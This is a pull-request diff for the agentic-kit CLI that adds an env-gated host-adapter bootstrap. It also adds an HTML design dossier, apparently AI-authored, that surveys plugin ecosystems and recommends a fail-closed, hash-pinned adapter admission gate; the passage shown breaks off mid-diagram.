### PR TITLE
Host & provider consistency: Phases 0–3 (registry dispatch, provider axis, extension point)

### DIFF
--- a/bin/agentic-kit.mjs
+++ b/bin/agentic-kit.mjs
@@ -144,6 +144,24 @@ async function main() {
     allowPositionals: true,
     strict: false,
   });
+
+  // Experimental host-adapter bootstrap (Wave 4, adapter door) — the single
+  // place every command passes through. Gated on the env var BEFORE anything
+  // else runs so the default (flag unset) is truly zero calls, zero output,
+  // zero behavior change: no dynamic import, no config read, nothing.
+  // Refusals are warnings on stderr, never fatal — a bad external adapter
+  // must never block a command that doesn't use it.
+  if (process.env.AK_EXPERIMENTAL_HOST_ADAPTERS === '1') {
+    try {
+      const { loadKitConfig } = await import('../src/lib/config.mjs');
+      const { bootstrapHostAdapters } = await import('../src/lib/adapters/admission.mjs');
+      const { warnings } = await bootstrapHostAdapters({ cfg: loadKitConfig(), env: process.env });
+      for (const w of warnings) {
+        console.error(dim(`⚠ host adapter '${w.name}' not admitted (${w.reason}): ${w.detail ?? ''}`.trimEnd()));
+      }
+    } catch { /* experimental surface — never blocks a command */ }
+  }
+
   const code = await mod.run({ flags: values, positionals, pkgRoot: PKG_ROOT });
 
   // Drift nudge: one line, cached, never blocks (skipped in --json contexts).

--- a/docs/ADAPTER-CONTRACT-DOSSIER.html
+++ b/docs/ADAPTER-CONTRACT-DOSSIER.html
@@ -1,0 +1,698 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>Adapter Contract Dossier</title>
+<style>
+  :root {
+    --bg: #faf7f4;
+    --surface: #f1ebe5;
+    --ink: #2b2420;
+    --muted: #6d6156;
+    --line: #ddd2c7;
+    --accent: #9a4e2e;
+    --accent-ink: #7c3d21;
+    --mono-bg: #ece4db;
+    --adopt: #2e6b46;
+    --adapt: #8a6d1f;
+    --avoid: #a03c34;
+    --chipbg-adopt: #e2efe7;
+    --chipbg-adapt: #f3ecd6;
+    --chipbg-avoid: #f6e3e0;
+  }
+  @media (prefers-color-scheme: dark) {
+    :root:not([data-theme="light"]) {
+      --bg: #201a16;
+      --surface: #2a221d;
+      --ink: #e8e0d8;
+      --muted: #a99c8f;
+      --line: #423731;
+      --accent: #d98a63;
+      --accent-ink: #e5a381;
+      --mono-bg: #322922;
+      --adopt: #7fc39a;
+      --adapt: #d3b45e;
+      --avoid: #e08a80;
+      --chipbg-adopt: #23372c;
+      --chipbg-adapt: #3a3221;
+      --chipbg-avoid: #3f2724;
+    }
+  }
+  :root[data-theme="dark"] {
+    --bg: #201a16;
+    --surface: #2a221d;
+    --ink: #e8e0d8;
+    --muted: #a99c8f;
+    --line: #423731;
+    --accent: #d98a63;
+    --accent-ink: #e5a381;
+    --mono-bg: #322922;
+    --adopt: #7fc39a;
+    --adapt: #d3b45e;
+    --avoid: #e08a80;
+    --chipbg-adopt: #23372c;
+    --chipbg-adapt: #3a3221;
+    --chipbg-avoid: #3f2724;
+  }
+  * { box-sizing: border-box; }
+  body {
+    background: var(--bg);
+    color: var(--ink);
+    font: 16px/1.65 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif;
+    margin: 0;
+    padding: 0 1.25rem 5rem;
+  }
+  main { max-width: 76ch; margin: 0 auto; }
+  h1, h2, h3 {
+    font-family: "Iowan Old Style", "Palatino Linotype", Palatino, Georgia, serif;
+    line-height: 1.25;
+    text-wrap: balance;
+  }
+  h1 { font-size: 2.1rem; margin: 2.5rem 0 0.4rem; }
+  h2 {
+    font-size: 1.45rem; margin: 3rem 0 0.8rem;
+    padding-top: 1.2rem; border-top: 1px solid var(--line);
+  }
+  h3 { font-size: 1.12rem; margin: 1.8rem 0 0.5rem; }
+  p { margin: 0.7rem 0; }
+  .lede { font-size: 1.08rem; color: var(--muted); max-width: 66ch; }
+  .meta { color: var(--muted); font-size: 0.85rem; letter-spacing: 0.02em; }
+  .eyebrow {
+    text-transform: uppercase; letter-spacing: 0.14em; font-size: 0.72rem;
+    color: var(--accent); font-weight: 600; margin-top: 3.2rem;
+  }
+  code, .mono {
+    font-family: ui-monospace, "SF Mono", Menlo, Consolas, monospace;
+    font-size: 0.86em;
+    background: var(--mono-bg);
+    padding: 0.08em 0.35em;
+    border-radius: 3px;
+  }
+  .cite {
+    font-family: ui-monospace, "SF Mono", Menlo, Consolas, monospace;
+    font-size: 0.76rem; color: var(--muted); background: none; padding: 0;
+  }
+  a { color: var(--accent-ink); }
+  table {
+    border-collapse: collapse; width: 100%; font-size: 0.9rem; margin: 1rem 0;
+  }
+  .tablewrap { overflow-x: auto; }
+  th, td {
+    text-align: left; padding: 0.5rem 0.7rem; vertical-align: top;
+    border-bottom: 1px solid var(--line);
+  }
+  th {
+    font-size: 0.72rem; text-transform: uppercase; letter-spacing: 0.08em;
+    color: var(--muted); font-weight: 600;
+  }
+  .chip {
+    display: inline-block; font-size: 0.7rem; font-weight: 700;
+    text-transform: uppercase; letter-spacing: 0.06em;
+    padding: 0.12em 0.55em; border-radius: 999px; white-space: nowrap;
+  }
+  .chip.adopt { color: var(--adopt); background: var(--chipbg-adopt); }
+  .chip.adapt { color: var(--adapt); background: var(--chipbg-adapt); }
+  .chip.avoid { color: var(--avoid); background: var(--chipbg-avoid); }
+  .panel {
+    background: var(--surface); border: 1px solid var(--line);
+    border-left: 3px solid var(--accent);
+    border-radius: 6px; padding: 1rem 1.2rem; margin: 1.4rem 0;
+  }
+  .panel h3 { margin-top: 0.2rem; }
+  ul, ol { padding-left: 1.3rem; }
+  li { margin: 0.35rem 0; }
+  .verdict {
+    display: grid; grid-template-columns: auto 1fr; gap: 0.4rem 1rem;
+    font-size: 0.95rem; margin: 1rem 0;
+  }
+  .verdict dt { font-weight: 700; white-space: nowrap; }
+  .verdict dd { margin: 0; }
+  nav.toc {
+    background: var(--surface); border: 1px solid var(--line); border-radius: 6px;
+    padding: 0.9rem 1.2rem; margin: 1.6rem 0; font-size: 0.92rem;
+  }
+  nav.toc a { text-decoration: none; }
+  nav.toc li { margin: 0.2rem 0; }
+  .qgrid { display: grid; gap: 0.9rem; margin: 1rem 0; }
+  .q {
+    border: 1px solid var(--line); border-radius: 6px; padding: 0.8rem 1rem;
+    background: var(--surface);
+  }
+  .q .qtag {
+    font-size: 0.7rem; font-weight: 700; letter-spacing: 0.08em;
+    text-transform: uppercase; color: var(--muted);
+  }
+  .q .state-open { color: var(--adapt); }
+  .q .state-closed { color: var(--adopt); }
+</style>
+</head>
+<body>
+<main>
+<div style="max-width:76ch;margin:1.4rem auto 0;padding:.55rem .95rem;background:var(--surface);border:1px solid var(--line);border-left:3px solid var(--accent);border-radius:8px;font-size:.82rem;line-height:1.5;color:var(--muted)">📎 <strong style="color:var(--accent)">Origin.</strong> Authored as a Claude artifact; this file is the repository’s local snapshot for review. Live version: <a href="https://claude.ai/code/artifact/d611cd1c-03a4-4c4b-9b9c-94d129b7ee0d" style="color:var(--accent)">https://claude.ai/code/artifact/d611cd1c-03a4-4c4b-9b9c-94d129b7ee0d</a></div>
+
+<p class="eyebrow">agentic-kit · phase 2 design input · grounded 2026-08-14/15</p>
+<h1>Adapter Contract Dossier</h1>
+<p class="lede">What four source-grounded research sweeps — ruflo's plugin history, the three
+hosts' extension models, Hermes at HEAD, and agentic-qe's parity constraints — teach us about
+building agentic-kit's host-adapter extension point without sacrificing quality, symmetry, or
+maintainability. Ends in one finalized mechanism recommendation and the decisions still open.</p>
+<p class="meta">Prepared 2026-08-15 · companion to the Host &amp; Provider Consistency master
+document · every claim below carries a citation from a live sweep of upstream source</p>
+
+<nav class="toc">
+  <strong>Contents</strong>
+  <ol>
+    <li><a href="#correction">The manifesto correction</a></li>
+    <li><a href="#evidence">Evidence base</a></li>
+    <li><a href="#lessons">Five load-bearing lessons</a></li>
+    <li><a href="#constraints">Hard constraints the design inherits</a></li>
+    <li><a href="#anatomy">Interfaces &amp; anatomy — as-is and to-be</a></li>
+    <li><a href="#mechanism">The recommended mechanism (Q2, finalized)</a></li>
+    <li><a href="#contract">Contract sketch</a></li>
+    <li><a href="#waves">Impact on the Phase 2 plan</a></li>
+    <li><a href="#decisions">Decision board</a></li>
+    <li><a href="#sources">Sources</a></li>
+  </ol>
+</nav>
+
+<h2 id="correction">1 · The manifesto correction</h2>
+<p><strong>"Everything is a plugin" is not ruflo's manifesto.</strong> The phrase is the title of
+a blog post for a different rUv product — <em>cognitum-open-design</em> v0.8.0
+(<span class="cite">apps/landing-page/…/open-design-0-8-0-everything-is-a-plugin.md</span>).
+Training data conflates the two because both are rUv projects with plugin systems; treat any
+unsourced claim of a ruflo "everything is a plugin" manifesto as false.</p>
+<p>Ruflo's actual founding document is
+<span class="cite">v3/implementation/adrs/ADR-004-PLUGIN-ARCHITECTURE.md</span> (Implemented,
+2026-01): <em>"We will adopt a microkernel architecture with plugins for optional features."</em>
+Core stays small (agent lifecycle, task execution, memory, coordination, MCP server); everything
+else is an optional plugin. Notably, one of its own success metrics was still unchecked at ship
+time: <code>[ ] Community plugin contributed</code>. That gap — a designed-for ecosystem that
+did not materialize on the designed timeline — frames every lesson below.</p>
+
+<h2 id="evidence">2 · Evidence base</h2>
+<div class="tablewrap"><table>
+  <tr><th>Sweep</th><th>Grounded against</th><th>Headline</th></tr>
+  <tr><td>ruflo</td><td><span class="cite">ruvnet/ruflo@45e65b5</span> (HEAD 3.38.11; local CLI 3.38.8)</td>
+    <td>Two plugin layers: the Claude Code plugin catalog (38 plugins, real and disciplined) and
+    the internal <code>IPlugin</code> runtime framework (well-designed; trust layer honestly
+    self-documented as demo/stub).</td></tr>
+  <tr><td>hosts</td><td>Claude Code docs (2026-08-14) · Codex <span class="cite">rust-v0.147.0</span> · OpenCode v1.18.18</td>
+    <td>Manifest-first everywhere mature; Codex's plugin system has <em>shipped</em> and converged
+    with Claude Code's hook taxonomy; nobody sandboxes or signs anything; every lifecycle has
+    real atomicity bugs.</td></tr>
+  <tr><td>hermes</td><td><span class="cite">NousResearch/hermes-agent@cb47f59</span> (245 commits past v0.20.1)</td>
+    <td>Every load-bearing adapter fact holds unchanged. New: a native ACP server (third driving
+    surface), a <code>--tui</code> statusline, three-tier hooks with consent allowlists. PyPI is
+    stale; the npm bridge now ships three bins.</td></tr>
+  <tr><td>agentic-qe</td><td>agentic-qe 3.13.10 (local = latest published)</td>
+    <td>Provider set closed at every layer; its real plugin system reaches QE domains only; the
+    <code>vendorOf</code> mirror is in sync; quality-gate anchors are a content-authoring task,
+    not a flag.</td></tr>
+</table></div>
+
+<h2 id="lessons">3 · Five load-bearing lessons</h2>
+
+<h3>3.1 Manifests ship; trust layers stall</h3>
+<p>Across every system surveyed, the parts that work are declarative data: Claude Code's
+<code>plugin.json</code>, Codex's semver-required <code>plugin.json</code>, aqe's
+<code>QEPluginManifest</code> with its fail-closed install gate, ruflo's flat
+<code>marketplace.json</code>. The parts that stalled are the code-trust layers: ruflo's typed
+<code>PluginPermissions</code> shipped as types with <em>zero runtime enforcement</em>
+(verified: no "permission"/"capability"/"sandbox" occurrence in either shipped registry file);
+its Ed25519-signed IPFS marketplace fell back to a hardcoded demo list every time by its own
+ADR's admission; no host sandboxes extension code; no host signs anything.
+<strong>Design consequence:</strong> make the adapter a data artifact validated by the same
+validators built-ins use, and never rely on honor-system runtime capability checks.</p>
+
+<h3>3.2 The design→ship gap is the #1 failure mode — counter it with graded ADRs</h3>
+<p>Ruflo's best practice is the antidote to its own failure: ADR-015-v2 carries a dated
+self-graded table (<em>Working / Demo / TBD</em> per feature). The reliable predictor of "is
+this mechanism real" across the whole sweep was whether the ADR carried that table with test
+counts. Ruflo also produced two near-identical, never-reconciled security ADRs from separate
+agent runs (ADR-145 / ADR-337) — a governance failure to design against.
+<strong>Design consequence:</strong> agentic-kit's extension ADRs ship with a graded table and
+are not marked Accepted until the table is backed by dated evidence; each published contract
+gets its own ADR pinned to an ak version, with a CI check that fails when the pin goes stale
+(ruflo's per-plugin contract ADRs drifted ~32 minor versions unnoticed).</p>
+
+<h3>3.3 Fail-closed admission is the differentiator; per-adapter isolation is table stakes</h3>
+<p>Hosts degrade by default — and their open bugs show even that contract breaking (a removed
+Codex plugin's <code>Stop</code> hook keeps firing until restart
+<span class="cite">openai/codex#38339</span>; an OpenCode plugin segfault left installs
+permanently unusable <span class="cite">anomalyco/opencode#26890</span>; a Claude Code
+marketplace update reports success while doing nothing
+<span class="cite">anthropics/claude-code#46594</span>). Ruflo's admission is warn-only even
+for unsigned plugins. Nobody in this space is fail-closed at the door — agentic-kit already is
+(ADR-0023), and should stay so: an invalid adapter is refused by name, never warned past.
+Equally: one bad adapter must never brick ak — which is precisely the F-01 import-time-throw
+blocker, now with ecosystem-wide evidence behind the fix.</p>
+
+<h3>3.4 Hash-pinned consent is the strongest achievable integrity primitive</h3>
+<p>Codex hash-pins each trusted hook and <em>invalidates trust automatically on any edit</em> —
+the strongest integrity mechanism found anywhere, and cheap. Hermes independently converged on
+per-<code>(event, command)</code> consent allowlists for its shell hooks. Signing exists nowhere.
+<strong>Design consequence:</strong> record a content hash of the adapter manifest (and each
+declared hook command) at trust time; a changed manifest re-prompts. This composes with ak's
+existing trust-manifest machinery and with aqe's <code>contentHash</code>-frozen anchor
+precedent. Do not require signatures the ecosystem cannot produce.</p>
+
+<h3>3.5 Conformance means black-box subprocess tests against the installed layout</h3>
+<p>Ruflo's hook regression (flags that didn't exist; <code>--success true</code> silently
+recording the string <code>"true"</code> as a path — <span class="cite">ADR-102</span>) was
+caught only by a harness that drives the <em>real CLI binary</em> with synthetic stdin and
+asserts <em>negative</em> cases. Its counter-example: a plugin smoke test hardcoding a
+monorepo-sibling path fails for every real installed user
+(<span class="cite">ruvnet/ruflo#2912</span>).
+<strong>Design consequence:</strong> the conformance kit spawns real processes, asserts negative
+cases, runs against an installed topology (not the repo checkout), and returns a numeric
+pass/fail — the contract's graduation evidence.</p>
+
+<h2 id="constraints">4 · Hard constraints the design inherits</h2>
+<ul>
+  <li><strong>AQE's provider set is closed at every layer</strong> — 11 declared types, 10
+  constructible (<code>onnx</code> is declared-but-unconstructible); its real plugin system
+  (<code>aqe plugin install</code>) reaches QE domains only. No adapter may ever project into
+  any AQE surface. Phase 1's asymmetry decision already encodes this.</li>
+  <li><strong>Two AQE "host" surfaces exist and must not be conflated</strong>: LLM-execution
+  binding (spawns <code>claude</code>/<code>codex</code>; closed) vs. platform/MCP installers
+  (8 hardcoded; closed). ak's extension point extends neither — it extends ak's own host axis.</li>
+  <li><strong>Driving surfaces are plural now.</strong> Hermes ships a native ACP
+  (Agent Client Protocol) server alongside CLI oneshot — the contract must express <em>how</em>
+  a host is driven (cli-subprocess, ACP, MCP) as declared capability data, not assume
+  subprocess.</li>
+  <li><strong>Detection can trust nothing indirect</strong>: Hermes's PyPI is two releases
+  stale while the unofficial npm bridge tracks releases within an hour and now ships three bins;
+  Claude Code plugin identity falls back through version→SHA→digest→unknown. Detect binaries and
+  verify independently; never infer identity or currency from a package registry.</li>
+  <li><strong>Statusline claims must be scoped</strong>: Hermes's statusline exists only in its
+  new <code>--tui</code> mode; Codex has no <code>tui.status_line</code> free-text key at all.
+  The capability vocabulary already handles this (<code>commandStatusline</code>) — keep claims
+  mode-scoped and truthful.</li>
+  <li><strong>The <code>vendorOf</code> mirror tracks upstream referee.ts</strong> — in sync at
+  aqe 3.13.10 with one documented fail-closed divergence; any upstream prefix-table change needs
+  a mirror update (no version gate exists beyond presence).</li>
+  <li><strong>Ruflo cannot drive Hermes.</strong> Its repo description names "Hermes" as
+  integrated, but source shows only technique adoptions <em>from</em> hermes-agent
+  (prompt-caching pattern, reasoning-tag scrubbing, tool-loop breaker —
+  <span class="cite">v3/@claude-flow/cli/__tests__/hermes-tier1.test.ts</span>); no Hermes
+  execution backend exists. Hermes reaches ak only through ak's own adapter seam.</li>
+</ul>
+
+<h2 id="anatomy">5 · Interfaces &amp; anatomy — as-is and to-be</h2>
+
+<h3>5.1 The interfaces ak actually has</h3>
+<p>Signatures below are read from source on this branch, not recalled. Everything in this table
+is host-neutral, validated, and test-enforced — this is the spine the extension point builds on.</p>
+<div class="tablewrap"><table>
+  <tr><th>Axis</th><th>Interface</th><th>Where</th></tr>
+  <tr><td>Registries</td>
+    <td><code>HOST_REGISTRY</code> · <code>PROVIDER_REGISTRY</code> · <code>PROJECTION_REGISTRY</code> ·
+    <code>OBSERVABILITY_REGISTRY</code> — immutable, cross-axis-validated <em>at construction</em>
+    (<code>validateRegistries</code> throws at load); capability queries
+    <code>hostIds(pred)</code>, <code>primaryHostIds()</code>, <code>routableHostIds()</code>,
+    <code>managedHostIds()</code>, <code>hostsWithCapability()</code>, <code>defaultHostMap()</code></td>
+    <td class="cite">adapters/registries.mjs</td></tr>
+  <tr><td>Bindings</td>
+    <td><code>assertValidBinding</code> (throwing) · <code>validateBinding</code> (error list —
+    wired to <code>ak host status</code> warnings) · <code>resolveBinding</code> ·
+    <code>validateEndpoint</code> (loopback-http / remote-https / secret-param rules)</td>
+    <td class="cite">adapters/bindings.mjs · adapters/config.mjs</td></tr>
+  <tr><td>Lifecycle</td>
+    <td><code>LIFECYCLE_OPERATIONS = [detect, plan, apply, verify, undo]</code> ·
+    <code>validateLifecycleAdapter</code> · <code>runLifecycle</code> (dry-run gate on apply) ·
+    <code>ownership()/mayUndo()</code> teardown-safety receipts</td>
+    <td class="cite">adapters/lifecycle.mjs · adapters/ownership.mjs</td></tr>
+  <tr><td>Execution</td>
+    <td><code>validateExecutionAdapter</code> — 8 required methods
+    <code>[readiness, prepare, launch, observe, interpret, summarize, cancel, cleanup]</code> ·
+    <code>validateWorkerResult</code> · <code>EXIT_CATEGORIES</code> incl.
+    <code>cli_unavailable</code> graceful degradation ·
+    <code>createSubprocessExecutionAdapter</code> ·
+    <code>createJsonlSummaryCapture</code> / <code>createPlainTextSummaryCapture</code></td>
+    <td class="cite">execution/schema.mjs · execution/subprocess.mjs</td></tr>
+  <tr><td>Facts</td>
+    <td><code>normalizedFacts</code> (<code>schemaVersion: 1</code>, provenance-bearing) ·
+    <code>provenance()/mergeProvenance()</code> · <code>mergeFacts</code> ·
+    <code>normalizeIntegrationFacts</code></td>
+    <td class="cite">adapters/facts.mjs</td></tr>
+  <tr><td>Trust</td>
+    <td>Per-host <code>trust.changes</code> declarations (kinds: auto-approve, mcp-registration,
+    lifecycle-extension, host-integration; scoped, operation-gated) — disclosed before first
+    mutation; synthetic-host injection already test-proven end-to-end</td>
+    <td class="cite">adapters/registries.mjs · tests/kit/trust-manifest.test.mjs</td></tr>
+  <tr><td>Config</td>
+    <td><code>migrateIntegrationConfig</code> (registry-derived native providers, idempotent,
+    ambiguity-guarded) · versioned <code>integrations</code>/<code>routing</code> envelopes</td>
+    <td class="cite">adapters/config.mjs · lib/config.mjs</td></tr>
+</table></div>
+
+<h3>5.2 The honest verdict: not spaghetti — bimodal</h3>
+<p>Introspection says the codebase is not a hack job; it is a <strong>disciplined core wearing
+an accreted shell</strong>. Every contract above was built host-neutral and is enforced by
+validators and tests — several at module construction, which is stricter than most of the
+ecosystem surveyed. The debt is concentrated and countable: roughly ten dispatch sites where a
+command reaches a host by <em>name</em> instead of by <em>lookup</em> — the five
+<code>OPENCODE_LIFECYCLE_ADAPTER</code> named-import call sites (F-02), the frozen three-entry
+execution map whose invariant throws at import (F-01), status's 88-line opencode block (F-05),
+routing's <code>{claude, codex}</code> literals and binary escalation swap (F-23), guidance's
+closed four-target list (F-17), setup's claude-only permission pass (F-04), uninstall bypassing
+<code>runLifecycle</code> (F-03), the fixed quota record (F-10), the two statusline patchers,
+and the hand-mirrored npm package list (F-18). Phases 0–1 already moved attribution, host
+defaults, the binding migrator, and provider records from the shell to the spine. Phase 2's
+waves 1–2 are precisely the remaining shell-to-spine moves — deletion of hand-wiring, not new
+machinery.</p>
+
+<figure>
+<svg viewBox="0 0 880 330" role="img" style="max-width:100%;height:auto"
+  aria-label="As-is: commands reach the contract core by two paths — a registry-driven spine and a hand-wired shell of named imports and literals">
+  <defs>
+    <marker id="ar1" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" fill="currentColor"/>
+    </marker>
+    <marker id="ar1a" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/>
+    </marker>
+  </defs>
+  <g font-size="12" fill="currentColor">
+    <!-- commands -->
+    <rect x="16" y="90" width="150" height="150" rx="6" fill="none" stroke="currentColor"/>
+    <text x="91" y="110" text-anchor="middle" font-weight="700">commands</text>
+    <text x="91" y="132" text-anchor="middle">setup · sync · host</text>
+    <text x="91" y="150" text-anchor="middle">run · status · usage</text>
+    <text x="91" y="168" text-anchor="middle">uninstall · live · about</text>
+    <!-- shell lane -->
+    <rect x="230" y="26" width="380" height="128" rx="6" fill="none" stroke-dasharray="6 4" style="stroke:var(--accent)"/>
+    <text x="420" y="46" text-anchor="middle" font-weight="700" style="fill:var(--accent)">the shell — reach-by-name (the debt)</text>
+    <text x="420" y="67" text-anchor="middle">OPENCODE_LIFECYCLE_ADAPTER named import ×5 · F-02</text>
+    <text x="420" y="85" text-anchor="middle">frozen 3-host execution map, throws at import · F-01</text>
+    <text x="420" y="103" text-anchor="middle">status: 88-line opencode block · F-05 &nbsp;·&nbsp; routing literals · F-23</text>
+    <text x="420" y="121" text-anchor="middle">guidance: 4 literal targets · F-17 &nbsp;·&nbsp; uninstall skips undo · F-03</text>
+    <text x="420" y="139" text-anchor="middle">claude-only permission pass · F-04 &nbsp;·&nbsp; fixed quota record · F-10</text>
+    <!-- spine lane -->
+    <rect x="230" y="178" width="380" height="110" rx="6" fill="none" stroke="currentColor"/>
+    <text x="420" y="198" text-anchor="middle" font-weight="700">the spine — reach-by-lookup (the base)</text>
+    <text x="420" y="219" text-anchor="middle">capability queries · defaultHostMap() · migrator derivation</text>
+    <text x="420" y="237" text-anchor="middle">validators on every load · trust disclosure · facts merge</text>
+    <text x="420" y="255" text-anchor="middle">truthful attribution (usage · live · court) — moved here</text>
+    <text x="420" y="273" text-anchor="middle">by Phases 0–1</text>
+    <!-- core -->
+    <rect x="672" y="66" width="192" height="196" rx="6" fill="none" stroke="currentColor" stroke-width="1.6"/>
+    <text x="768" y="88" text-anchor="middle" font-weight="700">contract core</text>
+    <text x="768" y="110" text-anchor="middle">registries + validators</text>
+    <text x="768" y="128" text-anchor="middle">lifecycle · 5 verbs</text>
+    <text x="768" y="146" text-anchor="middle">execution · 8 methods</text>
+    <text x="768" y="164" text-anchor="middle">facts · schemaVersion 1</text>
+    <text x="768" y="182" text-anchor="middle">bindings + endpoints</text>
+    <text x="768" y="200" text-anchor="middle">trust manifest</text>
+    <text x="768" y="222" text-anchor="middle" font-style="italic">construction-enforced,</text>
+    <text x="768" y="240" text-anchor="middle" font-style="italic">host-neutral, tested</text>
+    <!-- arrows -->
+    <line x1="166" y1="130" x2="226" y2="90" stroke-width="1.4" marker-end="url(#ar1a)" style="stroke:var(--accent)"/>
+    <line x1="166" y1="200" x2="226" y2="230" stroke="currentColor" stroke-width="1.4" marker-end="url(#ar1)"/>
+    <line x1="610" y1="90" x2="668" y2="120" stroke-width="1.4" marker-end="url(#ar1a)" style="stroke:var(--accent)"/>
+    <line x1="610" y1="230" x2="668" y2="200" stroke="currentColor" stroke-width="1.4" marker-end="url(#ar1)"/>
+    <text x="196" y="82" text-anchor="middle" font-size="11" style="fill:var(--accent)">by name</text>
+    <text x="196" y="248" text-anchor="middle" font-size="11">by lookup</text>
+  </g>
+</svg>
+<figcaption><strong>Fig 1 — as-is, conceptual.</strong> Two paths run between commands and the
+same contract core. The spine resolves hosts by registry lookup; the shell reaches specific
+hosts by name — each shell item is a finding, and each is a deletion target, not a rewrite.</figcaption>
+</figure>
+
+<figure>
+<svg viewBox="0 0 880 320" role="img" style="max-width:100%;height:auto"
+  aria-label="As-is sequence for ak sync: config migration flows through the registry spine, but the lifecycle adapter is reached by named import">
+  <defs>
+    <marker id="ar2" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" fill="currentColor"/>
+    </marker>
+    <marker id="ar2a" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/>
+    </marker>
+  </defs>
+  <g font-size="12" fill="currentColor">
+    <!-- lifelines -->
+    <text x="70" y="24" text-anchor="middle" font-weight="700">ak sync</text>
+    <text x="255" y="24" text-anchor="middle" font-weight="700">kit.json config</text>
+    <text x="455" y="24" text-anchor="middle" font-weight="700">adapters core</text>
+    <text x="650" y="24" text-anchor="middle" font-weight="700" style="fill:var(--accent)">opencode adapter</text>
+    <text x="650" y="40" text-anchor="middle" font-size="10" style="fill:var(--accent)">(named import — F-02)</text>
+    <text x="820" y="24" text-anchor="middle" font-weight="700">host surfaces</text>
+    <line x1="70" y1="48" x2="70" y2="300" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <line x1="255" y1="48" x2="255" y2="300" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <line x1="455" y1="48" x2="455" y2="300" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <line x1="650" y1="48" x2="650" y2="300" stroke-dasharray="3 4" opacity="0.7" style="stroke:var(--accent)"/>
+    <line x1="820" y1="48" x2="820" y2="300" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <!-- messages -->
+    <line x1="70" y1="66" x2="251" y2="66" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar2)"/>
+    <text x="160" y="60" text-anchor="middle" font-size="11">loadKitConfig()</text>
+    <line x1="255" y1="94" x2="451" y2="94" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar2)"/>
+    <text x="353" y="88" text-anchor="middle" font-size="11">migrateIntegrationConfig()</text>
+    <line x1="451" y1="120" x2="259" y2="120" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar2)"/>
+    <text x="353" y="114" text-anchor="middle" font-size="11">integrations v2 — registry-derived defaults</text>
+    <line x1="70" y1="158" x2="646" y2="158" stroke-width="1.3" marker-end="url(#ar2a)" style="stroke:var(--accent)"/>
+    <text x="353" y="152" text-anchor="middle" font-size="11" style="fill:var(--accent)">runLifecycle(detect · plan · apply · verify) — reached by name, not lookup</text>
+    <line x1="650" y1="186" x2="816" y2="186" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar2)"/>
+    <text x="733" y="180" text-anchor="middle" font-size="11">probe bins · write configs (backup-first)</text>
+    <line x1="816" y1="212" x2="654" y2="212" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar2)"/>
+    <text x="733" y="206" text-anchor="middle" font-size="11">facts (provenance-graded)</text>
+    <line x1="646" y1="238" x2="74" y2="238" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar2)"/>
+    <text x="353" y="232" text-anchor="middle" font-size="11">lifecycleResult · ownership receipt</text>
+    <rect x="120" y="258" width="640" height="34" rx="5" fill="none" stroke-dasharray="6 4" style="stroke:var(--accent)"/>
+    <text x="440" y="279" text-anchor="middle" font-size="11">the five verbs are host-neutral — but only one host's adapter is reachable, and only by its name</text>
+  </g>
+</svg>
+<figcaption><strong>Fig 2 — as-is, sequence (<code>ak sync</code> wiring pass).</strong> The
+config half already runs on the spine. The lifecycle half runs through the full five-verb
+contract — but the adapter is a named import; the same is true at setup, host pick, and host
+off, while uninstall skips the contract entirely.</figcaption>
+</figure>
+
+<h3>5.3 To-be: one path, one door</h3>
+
+<figure>
+<svg viewBox="0 0 880 350" role="img" style="max-width:100%;height:auto"
+  aria-label="To-be: every command resolves hosts through the registry; external adapters enter only through a fail-closed admission gate; capability caps are enforced by schema shape">
+  <defs>
+    <marker id="ar3" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" fill="currentColor"/>
+    </marker>
+    <marker id="ar3a" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/>
+    </marker>
+  </defs>
+  <g font-size="12" fill="currentColor">
+    <!-- adapter package -->
+    <rect x="16" y="40" width="180" height="104" rx="6" fill="none" stroke="currentColor"/>
+    <text x="106" y="62" text-anchor="middle" font-weight="700">adapter package</text>
+    <text x="106" y="84" text-anchor="middle">manifest.json — data only:</text>
+    <text x="106" y="102" text-anchor="middle">registry entry · detection</text>
+    <text x="106" y="120" text-anchor="middle">lifecycle data · hook argv</text>
+    <text x="106" y="138" text-anchor="middle">declared trust changes</text>
+    <!-- admission gate -->
+    <rect x="252" y="26" width="204" height="152" rx="6" fill="none" stroke-width="1.6" style="stroke:var(--accent)"/>
+    <text x="354" y="48" text-anchor="middle" font-weight="700" style="fill:var(--accent)">admission gate — fail closed</text>
+    <text x="354" y="70" text-anchor="middle">same validators as built-ins</text>
+    <text x="354" y="88" text-anchor="middle">caps by schema shape —</text>
+    <text x="354" y="106" text-anchor="middle">canBePrimary inexpressible</text>
+    <text x="354" y="124" text-anchor="middle">hash consent · re-consent on edit</text>
+    <text x="354" y="142" text-anchor="middle">contract: 1 version match</text>
+    <text x="354" y="164" text-anchor="middle" font-style="italic">refused ⇒ named reason,</text>
+    <!-- registry -->
+    <rect x="512" y="52" width="170" height="100" rx="6" fill="none" stroke="currentColor" stroke-width="1.6"/>
+    <text x="597" y="76" text-anchor="middle" font-weight="700">registry</text>
+    <text x="597" y="98" text-anchor="middle">built-ins + admitted</text>
